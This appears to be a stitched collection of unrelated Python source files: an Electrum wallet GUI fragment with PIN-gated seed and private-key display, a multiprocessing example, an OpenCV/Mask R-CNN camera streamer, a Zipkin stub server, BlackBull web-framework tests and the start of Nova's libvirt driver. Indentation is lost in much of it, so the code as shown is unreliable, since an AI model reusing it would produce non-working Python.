Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') +
':\n' + _('Electrum network not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
multiproc04.py
|
from multiprocessing import Process, Pipe
def f(conn):
conn.send([42, None, 'hello'])
conn.close()
if __name__ == '__main__':
parent_conn, child_conn = Pipe()
p = Process(target=f, args=(child_conn,))
p.start()
print(parent_conn.recv()) # prints "[42, None, 'hello']"
p.join()
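# Hedged aside (not part of the original example): Pipe() returns two *duplex*
# connections, so the parent could also send data back, e.g. parent_conn.send('ping')
# in the parent process and conn.recv() inside f() before conn.close().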
|
camera.py
|
#!/usr/bin/env python
# coding:utf-8
import os
import cv2
import time
import utils
import threading
import collections
import requests
import numpy as np
import argparse
import random
import os
#from profilehooks import profile # pip install profilehooks
class Fps(object):
def __init__(self, buffer_size=15):
self.last_frames_ts = collections.deque(maxlen=buffer_size)
self.lock = threading.Lock()
    def __call__(self):
        with self.lock:
            len_ts = self._len_ts()
            if len_ts >= 2:
                # len_ts timestamps span len_ts - 1 frame intervals
                return (len_ts - 1) / (self._newest_ts() - self._oldest_ts())
            return None
def _len_ts(self):
return len(self.last_frames_ts)
def _oldest_ts(self):
return self.last_frames_ts[0]
def _newest_ts(self):
return self.last_frames_ts[-1]
def new_frame(self):
with self.lock:
self.last_frames_ts.append(time.time())
def get_fps(self):
return self()
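# Usage sketch (illustrative only; this helper is an addition, not part of the
# original capture pipeline): call new_frame() once per processed frame and read
# the rolling estimate back by calling the Fps instance itself.
def _fps_usage_sketch():
    fps = Fps(buffer_size=30)
    for _ in range(5):
        fps.new_frame()
        time.sleep(0.01)  # pretend each frame takes ~10 ms
    return fps()          # roughly the loop's frame rate, or None if fewer than 2 frames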
class Camera(object):
__metaclass__ = utils.Singleton
def __init__(self, quality=80, width=640, height=480, threads=3):
self.quality = quality
# Using OpenCV to capture from device 0. If you have trouble capturing
# from a webcam, comment the line below out and use a video file
# instead.
self.video = cv2.VideoCapture(0)
# If you decide to use video.mp4, you must have this file in the folder
# as the main.py.
# self.video = cv2.VideoCapture('video.mp4')
self.font = cv2.FONT_HERSHEY_SIMPLEX
self.camera_fps = Fps(50)
self.network_fps = Fps(25)
self.prepare_frame_queue = utils.RenewQueue()
self.request_image_queue = utils.RenewQueue()
self.video.set(3, width)
self.video.set(4, height)
self.width = int(self.video.get(3))
self.height = int(self.video.get(4))
print('%sx%s' % (self.width, self.height))
self.get_frame_thread = threading.Thread(target=self.run_get_frame, name='get_frame')
self.get_frame_thread.daemon = True
self.get_frame_thread.start()
self.prepare_frame_thread = threading.Thread(target=self.run_prepare_frame, name='prepare_frame')
self.prepare_frame_thread.daemon = True
self.prepare_frame_thread.start()
def __del__(self):
self.video.release()
def run_get_frame(self):
while True:
frame = self.get_frame()
            # Only prepare_frame_queue has a consumer (run_prepare_frame); no
            # face-identification queue is defined on this class.
self.prepare_frame_queue.put(frame)
def run_prepare_frame(self):
while True:
frame = self.prepare_frame_queue.get()
self.prepare_frame(frame)
image = self.encode_frame_to_jpeg(frame)
self.request_image_queue.put(image)
def script_path(self):
return os.path.dirname(os.path.realpath(__file__))
@staticmethod
def send_to_influxdb(url, payload):
try:
requests.post(url, data=payload.encode())
except Exception as e:
print("Unable to write into InfluxDB: %s" % e)
pass
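    # Illustrative only: `url` and `payload` are caller-supplied; with InfluxDB 1.x
    # they would typically look like 'http://localhost:8086/write?db=metrics' and a
    # line-protocol string such as 'camera,host=cam01 fps=29.97'.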
def draw_fps(self, frame):
camera_fps = self.camera_fps()
if camera_fps is not None:
cv2.putText(frame, '{:5.2f} camera fps'.format(camera_fps),(10,self.height-50), self.font, 0.6, (250,25,250), 2)
network_fps = self.network_fps()
if network_fps is not None:
cv2.putText(frame, '{:5.2f} effective fps'.format(network_fps),(10,self.height-30), self.font, 0.6, (250,25,250), 2)
def draw_date(self, frame):
cv2.putText(frame, time.strftime("%c"), (10,20), self.font, 0.6,(250,25,250), 2)
#@profile
def get_frame(self):
success, frame = self.video.read()
self.camera_fps.new_frame()
return frame
#@profile
def encode_frame_to_jpeg(self, frame):
# We are using Motion JPEG, but OpenCV defaults to capture raw images,
# so we must encode it into JPEG in order to correctly display the
# video stream.
ret, jpeg = cv2.imencode('.jpg', frame,(cv2.IMWRITE_JPEG_QUALITY, self.quality))
return jpeg.tobytes()
#@profile
def prepare_frame(self, frame):
self.draw_fps(frame)
self.draw_date(frame)
#@profile
    def request_image(self):
        image = self.request_image_queue.get()
        frame = classify(image)
        # classify() returns an annotated numpy frame, so re-encode it to JPEG
        # bytes before handing it to the MJPEG generator.
        ret, jpeg = cv2.imencode('.jpg', frame, (cv2.IMWRITE_JPEG_QUALITY, self.quality))
        self.network_fps.new_frame()
        return jpeg.tobytes()
def mjpeg_generator(self):
"""Video streaming generator function."""
while True:
image = self.request_image()
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + image + b'\r\n')
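# Hedged usage sketch: this module does not import Flask, but a generator like the
# one above is typically served through a multipart/x-mixed-replace response whose
# boundary matches the b'--frame' marker used in mjpeg_generator(), for example:
def _mjpeg_flask_route_sketch():
    from flask import Flask, Response  # assumption: Flask is installed
    app = Flask(__name__)
    @app.route('/video_feed')
    def video_feed():
        return Response(Camera().mjpeg_generator(),
                        mimetype='multipart/x-mixed-replace; boundary=frame')
    return app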
def classify(image1):
    # load the COCO class labels our Mask R-CNN was trained on
    # (expand "~" so open() can resolve the model directory under $HOME)
    model_dir = os.path.expanduser("~/mask-rcnn-coco")
    labelsPath = os.path.sep.join([model_dir, "object_detection_classes_coco.txt"])
    LABELS = open(labelsPath).read().strip().split("\n")
    # load the set of colors that will be used when visualizing a given
    # instance segmentation
    colorsPath = os.path.sep.join([model_dir, "colors.txt"])
    COLORS = open(colorsPath).read().strip().split("\n")
    COLORS = [np.array(c.split(",")).astype("int") for c in COLORS]
    COLORS = np.array(COLORS, dtype="uint8")
    # derive the paths to the Mask R-CNN weights and model configuration
    weightsPath = os.path.sep.join([model_dir, "frozen_inference_graph.pb"])
    configPath = os.path.sep.join([model_dir, "mask_rcnn_inception_v2_coco_2018_01_28.pbtxt"])
# load our Mask R-CNN trained on the COCO dataset (90 classes)
# from disk
print("[INFO] loading Mask R-CNN from disk...")
net = cv2.dnn.readNetFromTensorflow(weightsPath, configPath)
    # decode the JPEG byte string handed over by the camera pipeline and grab
    # its spatial dimensions
    image = cv2.imdecode(np.frombuffer(image1, dtype=np.uint8), cv2.IMREAD_COLOR)
    (H, W) = image.shape[:2]
# construct a blob from the input image and then perform a forward
# pass of the Mask R-CNN, giving us (1) the bounding box coordinates
# of the objects in the image along with (2) the pixel-wise segmentation
# for each specific object
blob = cv2.dnn.blobFromImage(image, swapRB=True, crop=False)
net.setInput(blob)
start = time.time()
(boxes, masks) = net.forward(["detection_out_final", "detection_masks"])
end = time.time()
# show timing information and volume information on Mask R-CNN
print("[INFO] Mask R-CNN took {:.6f} seconds".format(end - start))
print("[INFO] boxes shape: {}".format(boxes.shape))
print("[INFO] masks shape: {}".format(masks.shape))
    # clone our original image once, so that every detection is drawn onto the
    # same output frame and a frame is still returned when no detection clears
    # the confidence threshold
    clone = image.copy()
    # loop over the number of detected objects
    for i in range(0, boxes.shape[2]):
        # extract the class ID of the detection along with the confidence
        # (i.e., probability) associated with the prediction
        classID = int(boxes[0, 0, i, 1])
        confidence = boxes[0, 0, i, 2]
        # filter out weak predictions by ensuring the detected probability
        # is greater than the minimum probability
        if confidence > 0.5:
# scale the bounding box coordinates back relative to the
# size of the image and then compute the width and the height
# of the bounding box
box = boxes[0, 0, i, 3:7] * np.array([W, H, W, H])
(startX, startY, endX, endY) = box.astype("int")
boxW = endX - startX
boxH = endY - startY
# extract the pixel-wise segmentation for the object, resize
# the mask such that it's the same dimensions of the bounding
# box, and then finally threshold to create a *binary* mask
mask = masks[i, classID]
mask = cv2.resize(mask, (boxW, boxH),
interpolation=cv2.INTER_NEAREST)
mask = (mask > 0.3)
# extract the ROI of the image
roi = clone[startY:endY, startX:endX]
# now, extract *only* the masked region of the ROI by passing
# in the boolean mask array as our slice condition
roi = roi[mask]
# randomly select a color that will be used to visualize this
# particular instance segmentation then create a transparent
# overlay by blending the randomly selected color with the ROI
color = random.choice(COLORS)
blended = ((0.4 * color) + (0.6 * roi)).astype("uint8")
# store the blended ROI in the original image
clone[startY:endY, startX:endX][mask] = blended
# draw the bounding box of the instance on the image
color = [int(c) for c in color]
cv2.rectangle(clone, (startX, startY), (endX, endY), color, 2)
# draw the predicted label and associated probability of the
# instance segmentation on the image
text = "{}: {:.4f}".format(LABELS[classID], confidence)
cv2.putText(clone, text, (startX, startY - 5),cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
return clone
def main():
print(Camera().request_image())
if __name__ == "__main__":
main()
|
zipkinStubServer.py
|
from bottle import post, Bottle, request
import json
import socket, struct
import queue
from threading import Thread
import server
class Span:
def __init__(self):
self.id = -1
self.name = ''
self.timestamp = -1
self.traceId = ''
self.duration = ''
self.parentId = ''
self.annotations = []
self.binaryAnnotations = []
class EndPoint:
def __init__(self):
self.ipv4 = ''
self.port = -1
self.serviceName = ''
class Annotation:
def __init__(self):
self.endpoint = EndPoint()
self.timestamp = -1
self.value = ""
class BinaryAnnotation:
def __init__(self):
self.endpoint = EndPoint()
self.key = ""
self.value = ""
class JsonEncoder:
spanAttributeList = ['name', 'id', 'timestamp', 'traceId', 'duration']
annotationAttributeList = ['timestamp', 'value']
binaryAnnotationAttributeList = ['key', 'value']
@staticmethod
def fromRawToEndPoint( endPointRawData):
endpoint = EndPoint()
endpoint.ipv4 = endPointRawData['ipv4']
endpoint.port = endPointRawData['port']
endpoint.serviceName = endPointRawData['serviceName'].encode('ascii', 'ignore')
return endpoint
@staticmethod
def fromRawToAnnotation( annotationRawData ):
annotation = Annotation()
for attribute in JsonEncoder.annotationAttributeList:
setattr(annotation, attribute, annotationRawData[attribute])
annotation.endpoint = JsonEncoder.fromRawToEndPoint( annotationRawData['endpoint'])
return annotation
@staticmethod
def fromRawToBinaryAnnotation( binaryAnnotationRawData ):
binaryAnnotation = BinaryAnnotation()
for attribute in JsonEncoder.binaryAnnotationAttributeList:
setattr(binaryAnnotation, attribute, binaryAnnotationRawData[attribute])
binaryAnnotation.endpoint = JsonEncoder.fromRawToEndPoint( binaryAnnotationRawData['endpoint'])
return binaryAnnotation
@staticmethod
def fromRawToSpan( spanRawData ):
span = Span()
for attribute in JsonEncoder.spanAttributeList:
setattr(span, attribute, spanRawData[attribute])
span.parentId = spanRawData.get('parentId', '')
for annotationData in spanRawData['annotations']:
annotation = JsonEncoder.fromRawToAnnotation( annotationData )
span.annotations.append(annotation)
for binaryAnnotationData in spanRawData['binaryAnnotations']:
binaryAnnotation = JsonEncoder.fromRawToBinaryAnnotation( binaryAnnotationData )
span.binaryAnnotations.append(binaryAnnotation)
return span
@staticmethod
def fromJson( data ):
spans = []
rawData = json.JSONDecoder().decode(data.decode('utf-8'))
for spanRawData in rawData:
spans.append(JsonEncoder.fromRawToSpan( spanRawData ))
return spans
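# Illustrative only: the smallest payload JsonEncoder.fromJson() accepts is a JSON
# list of spans whose annotations/binaryAnnotations carry ipv4/port/serviceName
# endpoints; parsing EXAMPLE_SPANS_JSON below yields a single Span object.
EXAMPLE_SPANS_JSON = (b'[{"name": "get", "id": "1", "timestamp": 1, "traceId": "abc",'
                      b' "duration": 10, "binaryAnnotations": [],'
                      b' "annotations": [{"timestamp": 1, "value": "sr",'
                      b' "endpoint": {"ipv4": "127.0.0.1", "port": 9411,'
                      b' "serviceName": "stub"}}]}]')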
class ZipkinStubServer(object):
def __init__(self, port = 9411):
self._port = port
self._messageQueue = queue.Queue()
self._running = False
self._thread = None
self.outQueue = None
self.startEvent = None
self._app = Bottle()
self._app.route(path = '/api/v1/spans', method = 'POST', callback = self.handleSpans)
self._server = server.WSGIRefServerStoppable(host = 'localhost', port = port)
def stop(self):
self._running = False
self._messageQueue.put(('',''))
self._thread.join()
self._server.stop()
def start(self):
self._running = True
self._thread = Thread(None, self.eventLoop, 'event loop', (), {})
self._thread.start()
self.startEvent.set()
self._app.run(server = self._server)
def handleSpans(self):
contentType = request.headers.get('Content-Type')
a = request.body.readlines()
self._messageQueue.put((contentType, a))
def eventLoop(self):
        while self._running:
try:
message = self._messageQueue.get(True)
if message[0] == 'application/json':
spans = JsonEncoder.fromJson(message[1][0])
self.outQueue.put( spans )
except queue.Empty:
pass
@staticmethod
def spawn(server, outQueue, startEvent):
server.outQueue = outQueue
server.startEvent = startEvent
server.start()
class ServerGuard:
def __init__(self, entryPoint, *args):
self._thread = None
self._entryPoint = entryPoint
self._args = args
def __enter__(self):
self._thread = Thread( target = self._entryPoint, args=self._args )
self._thread.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self._thread.join()
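# Usage sketch (illustrative; assumes the caller prepares a queue.Queue and a
# threading.Event, neither of which this module creates itself):
#   stub = ZipkinStubServer(9411)
#   spans_out, started = queue.Queue(), threading.Event()
#   with ServerGuard(ZipkinStubServer.spawn, stub, spans_out, started):
#       started.wait()
#       ...          # exercise code that reports spans to localhost:9411
#       stub.stop()  # stop() must run before the guard exits, or join() blocks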
|
test_BlackBull.py
|
from http import HTTPStatus
import ssl
import pathlib
from blackbull.logger import get_logger_set
# Library for test-fixture
from multiprocessing import Process
import asyncio
import pytest
# Test targets
from blackbull import BlackBull, Response, WebSocketResponse
from blackbull.utils import Scheme, HTTPMethods
# from blackbull.middlewares import websocket
# Library for tests
import httpx
import websockets
logger, log = get_logger_set()
def run_application(app):
logger.info('dummy is called.')
loop = asyncio.new_event_loop()
task = loop.create_task(app.run())
loop.run_until_complete(task)
@pytest.fixture
async def app():
# run before the test
logger.info('At set-up.')
app = BlackBull()
cd = pathlib.Path(__file__).parent
app.create_server(certfile=cd / 'cert.pem', keyfile=cd / 'key.pem')
# Routing not using middleware.
@app.route(path='/test')
async def test_(scope, receive, send):
logger.debug(f'test_({scope}, {receive}, {send})')
await Response(send, 'sample')
@app.route_404
async def test_404(scope, receive, send):
logger.debug(f'test_404({scope}, {receive}, {send})')
await Response(send, 'not found test.', status=HTTPStatus.NOT_FOUND)
# Routing using middleware.
async def test_fn1(scope, receive, send, inner):
logger.info('test_fn1 starts.')
res = await inner(scope, receive, send)
logger.info(f'test_fn1 ends. res = {res}')
await Response(send, res + 'fn1')
async def test_fn2(scope, receive, send, inner):
logger.info('test_fn2 starts.')
res = await inner(scope, receive, send)
logger.info(f'test_fn2 ends. res = {res}')
return res + 'fn2'
async def test_fn3(scope, receive, send, inner):
logger.info('test_fn3 starts.')
await inner(scope, receive, send)
logger.info('test_fn3 ends.')
return 'fn3'
app.route(methods='get', path='/test2', functions=[test_fn1, test_fn2, test_fn3])
@app.route(path='/websocket1', scheme=Scheme.websocket)
async def websocket1(scope, receive, send):
accept = {"type": "websocket.accept", "subprotocol": None}
# msg = await receive()
await send(accept)
while msg := (await receive()):
if 'text' in msg:
                logger.debug(f'Got a text message ({msg}).')
            elif 'bytes' in msg:
                logger.debug(f'Got a byte-string message ({msg}).')
else:
logger.info('The received message does not contain any message.')
break
await WebSocketResponse(send, msg)
await send({'type': 'websocket.close'})
async def websocket2(scope, receive, send):
while msg := (await receive()):
await WebSocketResponse(send, msg)
app.route(path='/websocket2', scheme=Scheme.websocket,
functions=[websocket2])
@app.route(path='/push', methods=[HTTPMethods.post])
async def server_push(scope, receive, send):
# await Response(send, 'Any message?', more_body=True)
request = await receive()
while request['type'] != 'http.disconnect' and request['body'] != 'Bye':
msg = request['body']
await Response(send, msg, more_body=True)
try:
request = await asyncio.wait_for(receive(), timeout=0.5)
except asyncio.TimeoutError:
logger.debug('Have not received any message in this second.')
await Response(send, 'Any message?', more_body=True)
p = Process(target=run_application, args=(app,))
p.start()
yield app
logger.info('At teardown.')
app.stop()
p.terminate()
@pytest.fixture
async def ssl_context():
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
logger.info(pathlib.Path(__file__))
localhost_pem = pathlib.Path(__file__).with_name("cert.pem")
ssl_context.load_verify_locations(localhost_pem)
yield ssl_context
# At tear down.
pass
@pytest.fixture
async def ssl_h2context():
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
logger.info(pathlib.Path(__file__))
localhost_pem = pathlib.Path(__file__).with_name("cert.pem")
ssl_context.load_verify_locations(localhost_pem)
ssl_context.set_alpn_protocols(['h2'])
yield ssl_context
# At tear down.
pass
# @pytest.mark.asyncio
# async def test_response_200(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/test', headers={'key': 'value'})
# assert res.status_code == 200
# @pytest.mark.asyncio
# async def test_response_404_fn(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/badpath', headers={'key': 'value'})
# assert res.status_code == 404
# assert res.content == b'not found test.'
# @pytest.mark.asyncio
# async def test_routing_middleware(app):
# async with httpx.AsyncClient(http2=True, verify=False) as c:
# res = await c.get(f'https://localhost:{app.port}/test2', headers={'key': 'value'})
# assert res.status_code == 200
# assert res.content == b'fn3fn2fn1'
@pytest.mark.asyncio
async def test_websocket_response(app, ssl_context):
uri = f"wss://localhost:{app.port}/websocket1"
async with websockets.connect(uri, ssl=ssl_context) as client:
logger.debug('Websocket has been connected.')
name = 'Toshio'
await asyncio.wait_for(client.send(name), timeout=0.1)
logger.info('Have sent.')
response = await asyncio.wait_for(client.recv(), timeout=0.1)
assert response == name
# @pytest.mark.asyncio
# async def test_http2_server_push(app, ssl_context):
# uri = f'127.0.0.1:{app.port}'
# msg = b'hello'
# with HTTPConnection(uri, secure=True, enable_push=True, ssl_context=ssl_context) as conn:
# conn.request('post', '/http2', body=msg)
# for push in conn.get_pushes(): # all pushes promised before response headers
# logger.info(push.path)
# response = conn.get_response()
# assert response.read() == msg
# for push in conn.get_pushes(): # all other pushes
# logger.info(push.path)
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from xml.dom import minidom
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common.notifier import api as notifier
from nova.openstack.common import processutils
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
default=None,
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
default=None,
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
default=None,
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
cfg.BoolOpt('libvirt_inject_password',
default=False,
help='Inject the admin password at boot time, '
'without an agent.'),
cfg.BoolOpt('libvirt_inject_key',
default=True,
help='Inject the ssh public key at boot time'),
cfg.IntOpt('libvirt_inject_partition',
default=1,
help='The partition to inject to : '
'-2 => disable, -1 => inspect (libguestfs only), '
'0 => not partitioned, >0 => partition number'),
cfg.BoolOpt('use_usb_tablet',
default=True,
help='Sync virtual and real mouse cursors in Windows VMs'),
cfg.StrOpt('live_migration_uri',
default="qemu+tcp://%s/system",
help='Migration target URI '
'(any included "%s" is replaced with '
'the migration target hostname)'),
cfg.StrOpt('live_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER',
help='Migration flags to be set for live migration'),
cfg.StrOpt('block_migration_flag',
default='VIR_MIGRATE_UNDEFINE_SOURCE, VIR_MIGRATE_PEER2PEER, '
'VIR_MIGRATE_NON_SHARED_INC',
help='Migration flags to be set for block migration'),
cfg.IntOpt('live_migration_bandwidth',
default=0,
help='Maximum bandwidth to be used during migration, in Mbps'),
cfg.StrOpt('snapshot_image_format',
default=None,
help='Snapshot image format (valid options are : '
'raw, qcow2, vmdk, vdi). '
'Defaults to same as source image'),
cfg.StrOpt('libvirt_vif_driver',
default='nova.virt.libvirt.vif.LibvirtGenericVIFDriver',
help='The libvirt VIF driver to configure the VIFs.'),
cfg.ListOpt('libvirt_volume_drivers',
default=[
'iscsi=nova.virt.libvirt.volume.LibvirtISCSIVolumeDriver',
'local=nova.virt.libvirt.volume.LibvirtVolumeDriver',
'fake=nova.virt.libvirt.volume.LibvirtFakeVolumeDriver',
'rbd=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'sheepdog=nova.virt.libvirt.volume.LibvirtNetVolumeDriver',
'nfs=nova.virt.libvirt.volume.LibvirtNFSVolumeDriver',
'aoe=nova.virt.libvirt.volume.LibvirtAOEVolumeDriver',
'glusterfs='
'nova.virt.libvirt.volume.LibvirtGlusterfsVolumeDriver',
'fibre_channel=nova.virt.libvirt.volume.'
'LibvirtFibreChannelVolumeDriver',
'scality='
'nova.virt.libvirt.volume.LibvirtScalityVolumeDriver',
],
help='Libvirt handlers for remote volumes.'),
cfg.StrOpt('libvirt_disk_prefix',
default=None,
help='Override the default disk prefix for the devices attached'
' to a server, which is dependent on libvirt_type. '
'(valid options are: sd, xvd, uvd, vd)'),
cfg.IntOpt('libvirt_wait_soft_reboot_seconds',
default=120,
help='Number of seconds to wait for instance to shut down after'
' soft reboot request is made. We fall back to hard reboot'
' if instance does not shutdown within this window.'),
cfg.BoolOpt('libvirt_nonblocking',
default=True,
help='Use a separated OS thread pool to realize non-blocking'
' libvirt calls'),
cfg.StrOpt('libvirt_cpu_mode',
default=None,
help='Set to "host-model" to clone the host CPU feature flags; '
'to "host-passthrough" to use the host CPU model exactly; '
'to "custom" to use a named CPU model; '
'to "none" to not set any CPU model. '
'If libvirt_type="kvm|qemu", it will default to '
'"host-model", otherwise it will default to "none"'),
cfg.StrOpt('libvirt_cpu_model',
default=None,
help='Set to a named libvirt CPU model (see names listed '
'in /usr/share/libvirt/cpu_map.xml). Only has effect if '
'libvirt_cpu_mode="custom" and libvirt_type="kvm|qemu"'),
cfg.StrOpt('libvirt_snapshots_directory',
default='$instances_path/snapshots',
help='Location where libvirt driver will store snapshots '
'before uploading them to image service'),
cfg.StrOpt('xen_hvmloader_path',
default='/usr/lib/xen/boot/hvmloader',
help='Location where the Xen hvmloader is kept'),
cfg.ListOpt('disk_cachemodes',
default=[],
help='Specific cachemodes to use for different disk types '
'e.g: ["file=directsync","block=none"]'),
cfg.StrOpt('vcpu_pin_set',
default=None,
help='Which pcpus can be used by vcpus of instance '
'e.g: "4-12,^8,15"'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_opts)
CONF.import_opt('host', 'nova.netconf')
CONF.import_opt('my_ip', 'nova.netconf')
CONF.import_opt('default_ephemeral_format', 'nova.virt.driver')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('live_migration_retry_count', 'nova.compute.manager')
CONF.import_opt('vncserver_proxyclient_address', 'nova.vnc')
CONF.import_opt('server_proxyclient_address', 'nova.spice', group='spice')
DEFAULT_FIREWALL_DRIVER = "%s.%s" % (
libvirt_firewall.__name__,
libvirt_firewall.IptablesFirewallDriver.__name__)
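# Upper bound on the amount of console log data returned to callers
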